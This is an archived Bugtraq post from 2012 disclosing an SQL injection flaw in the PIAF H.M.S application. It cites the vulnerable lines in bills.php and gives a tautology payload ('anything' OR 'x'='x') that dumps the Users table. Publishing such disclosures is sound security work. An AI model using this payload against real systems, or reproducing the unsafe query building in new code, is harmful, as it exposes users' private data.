[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

PIAF H.M.S - SQL Injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PIAF H.M.S - SQL Injection
From: Michał Błaszczak <blaszczakm@xxxxxxxxx>
Date: Sun, 28 Oct 2012 13:29:31 +0100

# Exploit Title: PIAF H.M.S - SQL Injection
# Date: 28/10/2012
# Author: Michał Błaszczak
# Website: http://blaszczakm.blogspot.com
# Vendor Homepage: http://code.google.com/p/piafhms/

file: bills.php
line: 86-87

        $query = $query . " ORDER BY ID DESC";
        printf($query);

query:
SELECT * FROM `Users` WHERE `Room` = 'anything' OR 'x'='x' ORDER BY ID DESC


Michał Błaszczak
blaszczakm.blogspot.com

Prev by Date: KmPlayer v3.0.0.1440 Local Crash PoC
Next by Date: Call for Papers: DIMVA 2013
Previous by thread: KmPlayer v3.0.0.1440 Local Crash PoC
Next by thread: Call for Papers: DIMVA 2013
Index(es):
- Date
- Thread